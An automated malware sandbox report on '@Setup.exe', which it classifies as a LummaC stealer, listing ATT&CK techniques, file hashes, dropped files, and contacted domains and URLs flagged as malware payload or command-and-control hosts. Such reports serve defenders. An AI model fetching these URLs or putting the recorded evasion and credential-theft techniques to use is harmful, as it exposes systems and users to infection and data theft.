      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior

      Remote Access Functionality

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
      | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
      | Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Input Capture | 13 File and Directory Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
      | Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 12 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 226 System Information Discovery | SMB/Windows Admin Shares | 11 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
      | Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 521 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 111 Masquerading | LSA Secrets | 3 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 221 Virtualization/Sandbox Evasion | Cached Domain Credentials | 221 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
      | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 2 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
      [Behavior graph omitted] Behavior Graph ID: 1582040, Sample: @Setup.exe, Startdate: 29/12/2024, Architecture: WINDOWS, Score: 100

      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | @Setup.exe | 24% | Virustotal | | Browse |
      | @Setup.exe | 16% | ReversingLabs | Win32.Trojan.Generic | |
      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe | 14% | ReversingLabs | Win32.Trojan.Hulk | |
      | C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp | 3% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp | 3% | ReversingLabs | | |
      | C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | | |
      | C:\Users\user\AppData\Roaming\ColorStreamLib\is-GC8MC.tmp | 8% | ReversingLabs | | |
      No Antivirus matches
      No Antivirus matches
      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | https://battlecaredh.click/api | 0% | Avira URL Cloud | safe | |
      | https://dfgh.online/invoker.php?compName= | 0% | Avira URL Cloud | safe | |
      | https://dfgh.online | 0% | Avira URL Cloud | safe | |
      | http://www.autohotkey.comCould | 0% | Avira URL Cloud | safe | |
      | https://cegu.shop/8574262446/ph.txt | 100% | Avira URL Cloud | malware | |
      | http://crl.usertru | 0% | Avira URL Cloud | safe | |
      | http://michaeluno.jp/4 | 0% | Avira URL Cloud | safe | |
      | http://crl.usertr | 0% | Avira URL Cloud | safe | |
      | https://klipvumisui.shop/int_clp_sha.txt | 100% | Avira URL Cloud | malware | |
      | https://dfgh.online/invoker.php?compName=user-PC | 0% | Avira URL Cloud | safe | |
      | http://michaeluno.jp/ | 0% | Avira URL Cloud | safe | |
      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
      |---|---|---|---|---|---|
      | cegu.shop | 185.161.251.21 | true | false | | high |
      | battlecaredh.click | 104.21.32.1 | true | true | | unknown |
      | klipvumisui.shop | 104.21.37.128 | true | false | | high |
      | ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpK | unknown | unknown | false | | unknown |
      | dfgh.online | unknown | unknown | true | | unknown |
      | Name | Malicious | Antivirus Detection | Reputation |
      |---|---|---|---|
      | https://battlecaredh.click/api | true | Avira URL Cloud: safe | unknown |
      | https://klipvumisui.shop/int_clp_sha.txt | false | Avira URL Cloud: malware | unknown |
      | https://cegu.shop/8574262446/ph.txt | false | Avira URL Cloud: malware | unknown |
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0@Setup.exefalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.37.128 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false
104.21.32.1 | battlecaredh.click | United States | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1582040
Start date and time:2024-12-29 16:35:37 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:51
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:@Setup.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@84/35@5/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BrightLib.exe, PID 3612 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 6468 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:36:27 | API Interceptor | 1x Sleep call for process: @Setup.exe modified
10:36:30 | API Interceptor | 10x Sleep call for process: Corporation.com modified
10:37:07 | API Interceptor | 7x Sleep call for process: powershell.exe modified
10:38:06 | API Interceptor | 1x Sleep call for process: BrightLib.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.37.128installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                            • redroomaudio.com/administrator/index.php
                                                                                                            185.161.251.21Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                              MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            cegu.shopWinter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            klipvumisui.shopMdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 172.67.208.58
                                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 172.67.208.58
                                                                                                                            Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            CLOUDFLARENETUSLets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 104.21.81.224
                                                                                                                            KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 104.21.81.224
                                                                                                                            Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 104.21.81.224
                                                                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                            • 172.67.190.234
                                                                                                                            T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.64.150.63
                                                                                                                            Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.80.1
                                                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 172.67.208.58
                                                                                                                            rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 172.67.165.100
                                                                                                                            NTLGBWinter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                            • 81.97.105.115
                                                                                                                            installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                            • 185.161.251.21
                                                                                                                            xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 163.165.65.186
                                                                                                                            CLOUDFLARENETUSLets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 104.21.81.224
                                                                                                                            KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 104.21.81.224
                                                                                                                            Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 104.21.81.224
                                                                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                            • 172.67.190.234
                                                                                                                            T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.64.150.63
                                                                                                                            Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.80.1
                                                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 172.67.208.58
                                                                                                                            rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.32.1
                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                            • 172.67.165.100
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            • 104.21.32.1
                                                                                                                            • 185.161.251.21
                                                                                                                            Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            • 104.21.32.1
                                                                                                                            • 185.161.251.21
                                                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            • 104.21.32.1
                                                                                                                            • 185.161.251.21
                                                                                                                            rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            • 104.21.32.1
                                                                                                                            • 185.161.251.21
                                                                                                                            SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            • 104.21.32.1
                                                                                                                            • 185.161.251.21
                                                                                                                            gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                            • 104.21.37.128
                                                                                                                            • 104.21.32.1
                                                                                                                            • 185.161.251.21
                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
Crosshair-X.exe | Get hash | malicious | LummaC | Browse
!Set-up..exe | Get hash | malicious | LummaC Stealer | Browse
!Setup.exe | Get hash | malicious | LummaC Stealer | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe | MdhO83N5Fm.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com | !Set-up..exe | Get hash | malicious | LummaC Stealer | Browse |
 | !Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
 | SgMuuLxOCJ.exe | Get hash | malicious | LummaC | Browse |
 | TNyOrM6mIM.exe | Get hash | malicious | LummaC | Browse |
 | j2nLC29vCy.exe | Get hash | malicious | LummaC | Browse |
 | es5qBEFupj.exe | Get hash | malicious | LummaC | Browse |
 | vUcZzNWkKc.exe | Get hash | malicious | LummaC | Browse |
 | CLaYpUL3zw.exe | Get hash | malicious | LummaC | Browse |
 | BagsThroat.exe | Get hash | malicious | LummaC Stealer | Browse |
 | installer_1.05_36.4.exe | Get hash | malicious | LummaC Stealer | Browse |
                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):947288
                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: !Set-up..exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: TNyOrM6mIM.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: j2nLC29vCy.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: es5qBEFupj.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: vUcZzNWkKc.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):478587
                                                                                                                                                  Entropy (8bit):7.999641686075846
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:12288:Yx2CwYOqVBA6isEnCG+J4Tx9qzaQ/Xhk+QiuBT:Yx2CwYhVisEnC9ezYa4Mi4T
                                                                                                                                                  MD5:0C61CD4AB0362B5B9D88AA4458E857E2
                                                                                                                                                  SHA1:F037590574C495584B9A96E53A6E9B76D672BB74
                                                                                                                                                  SHA-256:E2F004D2ABFBE415FC74900B1BC4D32469FCEF4D8B5A695C33A3B7733139577B
                                                                                                                                                  SHA-512:6358E12DA6AF6498A1EBE0752EDCBCF0787CB45B258EBD6997A22E6F3587A084DF66F11928D9C6FEF6A844AE2062F311F9E3B2651339DF96AEE7E5598A0857FD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):74752
                                                                                                                                                  Entropy (8bit):6.582019703897572
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:6B6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmb/:6BypIbv18mLthfhnueoMmOqDoioO5bLe
                                                                                                                                                  MD5:53AA0D880818D063794DFA74175CD38C
                                                                                                                                                  SHA1:0324D5F95502E82BA816BA2D2A2211C9602DC7F1
                                                                                                                                                  SHA-256:C967E7284CCA53B26306F1599690B4F4E4C65EE6865E0C08572EA6C8FF1CFC0E
                                                                                                                                                  SHA-512:E665338A47CA8498859635ACF18A8A7C199546061C0E02703152B314C06F74E505222C922473897FF10CF7590D2A17479BD68DF6CB216AE9DF9D81CA0E128319
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:Microsoft Cabinet archive data, 488494 bytes, 10 files, at 0x2c +A "Nervous" +A "Tobacco", ID 7791, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):488494
                                                                                                                                                  Entropy (8bit):7.998658368977443
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:12288:WyfXya+XjYWJsdCkgIydMVSp7au8LW56ydy83i:PPe9KCkVyFf8LW5o4i
                                                                                                                                                  MD5:B8E30FA22676BF1C4CAE54F3837DE693
                                                                                                                                                  SHA1:88990F7C5071C3ADFD7BD9E1EAEE53CE48B7AEE7
                                                                                                                                                  SHA-256:1938541280BB6FF9FC992C77AA126FEC1B994912F2A2D146BE8D64997C8CF85F
                                                                                                                                                  SHA-512:11340AD4320C0253947E99BB0CA062FEF79C1B8D57E760C21D3FE4DC7458F30465C8DE1B3847B917EAE4768DDB8BFEE8E8F808D6E17CE4B02765D7323DF6114D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):74752
                                                                                                                                                  Entropy (8bit):7.997828983849457
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:UD86pxIZ5DlXmmB+iWeYwswCD7PecgC1Ct5s9tKnPq0g:D6pE4mpWeYbwCDrDgt5YtAP2
                                                                                                                                                  MD5:EDEF5B0E270C1F02DD77ED714B2FB021
                                                                                                                                                  SHA1:E6E13F3FA69758956C36F1D80E1F1E622C292533
                                                                                                                                                  SHA-256:AB35CF9558516334CCBDC4C8FDB3A9D2298695C20D329435AADE80B3DDB7930A
                                                                                                                                                  SHA-512:87830E9464DB3BB79431447CE2A08A8B3D5C1A2A14B32D98C74AEBFEA80958FCA1FDDEAD9E2CFE738097542C6D6940479B5E95A785C331259DF6B526B0E8E2CD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):96256
                                                                                                                                                  Entropy (8bit):7.9983907979737765
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:6WZvMSHghGRg1zIDxWQxw+W+ijc0VSGPt9JICstdt8kH26AS:DuSH+GROUVdz0VhtrId8kH2q
                                                                                                                                                  MD5:3D92BCD3F74FE30C2C3DBE159F944CCD
                                                                                                                                                  SHA1:A96F3D394EDF0348A8D8FDD24FCF3D0F23F276F8
                                                                                                                                                  SHA-256:84CD07C7959CFBB7AC3142ABF634E7943B8D2B93739CB63DDD274221A0208235
                                                                                                                                                  SHA-512:37C42236A8CE93BA90129F3D6FC9EE039DE57D2C892600FF6FB334A72B9BAE7879682FBC40D29CB1104436C8632885C3C90C7883584C027D4AF9008BBEEFC085
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1945
                                                                                                                                                  Entropy (8bit):4.925781792818579
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:99n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhQ:vSEA5O5W+MfH5Q
                                                                                                                                                  MD5:1F8EDF2231305436DEBAC80A54E27189
                                                                                                                                                  SHA1:05001891B64BE7AC57E6C9B25248B437A6C48C47
                                                                                                                                                  SHA-256:D39BF60C0432815D74F9C6788B2BDCF437AE7D85199D5193B18617EC84B44706
                                                                                                                                                  SHA-512:74B250AAA2693B776FA831D2807CCE49693B3B4CBB19A8BD9F49BC34D23A50CA5A1AC98F48D88037338E02224832A2CDD1F5AA67B8C951F2C6A9E596506B0190
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):146432
                                                                                                                                                  Entropy (8bit):5.720198278544326
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:tHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPdKaj6iTc+:tLeAg0Fuz08XvBNbjaAtsPh6g
                                                                                                                                                  MD5:8093525CB57FDEDD838AA472BD6C6FAD
                                                                                                                                                  SHA1:4A2468509BFC58F537C496BF3D59C469A4B6ABB7
                                                                                                                                                  SHA-256:FF4339567BDE639232050F28B904C45CEEB8CB5D227B01613CFCB4E3CA8F1C13
                                                                                                                                                  SHA-512:846DFE96EB5CEFDE1940E9B89B93F58FA00D98C5FECD149193BD327C289768445DDA74A25E601449730D385E0AE59C1F5F25CD3573E5D16D9E78B3F312729511
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20859
                                                                                                                                                  Entropy (8bit):7.990845783567328
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:YSJP1+QgcDUoiXthVTu+3/vQAC2eWKjen+mLVMrYKit+SMiQcw0uh:DzDHiX7Bu+3Qk7nMrZiGzcwR
                                                                                                                                                  MD5:099C520FC6528B6254315EB532F10453
                                                                                                                                                  SHA1:38EFB8F29271FDC537EF8F4FB8553823F2E763E8
                                                                                                                                                  SHA-256:B95E46D1C43741EAB91574DF3E293F8557EA67BD85BE4B43D9267F2BD6A1FDB5
                                                                                                                                                  SHA-512:68A31894774C336D6C6FF0634362924ABAB6B7F57C8229FD17B76DA1974435397C0D427582305AE4DCF8C0F2253544C53552BB9E5F43318A517EF309BEB98FF8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):68608
                                                                                                                                                  Entropy (8bit):6.126991862764221
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:xzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8aZ:xzW9FfTut/Dde6u640ewy4Za9coRC2jI
                                                                                                                                                  MD5:83BDDB0041F32CA7E1E565391B2F8D04
                                                                                                                                                  SHA1:83FC8996C5569A86EA38991A6927651B0CA4A2E6
                                                                                                                                                  SHA-256:1B7AB12CA2B48BB7A74A3F493B38EF9D5EF29493ECBD6B73D01D2867758641F1
                                                                                                                                                  SHA-512:1E2F5E535286BCD0165E466D9470E1E468631DA8D8191B91BC363F2C351809C28A9D6BF76368EA13D6FC8D8BEA0F1E0C6B9F2E32581280FE08DA8E91F95D675B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):73728
                                                                                                                                                  Entropy (8bit):7.997784398520827
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:OuNyCWXbvs4ZObeGtCPDp53hhwPRn4wWQLGotrmuD3ljrynEr4Nz:RyC+7s4ZZr5hwJn4l1qZryEr4h
                                                                                                                                                  MD5:5F4C387220525BFDCD11C22994EBD89C
                                                                                                                                                  SHA1:F852ABDDFC4D117C1A82BEC3151D23953B407C02
                                                                                                                                                  SHA-256:1DF09DC96DE0647DB6A2FFBCAE2C6F2403D949076E157FC53D160DB186AFA13B
                                                                                                                                                  SHA-512:FD80DB6B618C60F6F4E83C89B83712A848A9117C5C1A82C47D6B3E461D927C09CA30F2087A7BBCA84E72F3457229A97106F0AE157082F1ECA426CFFFDF72EEC4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):143360
                                                                                                                                                  Entropy (8bit):6.423581662256162
                                                                                                                                                  Encrypted:false
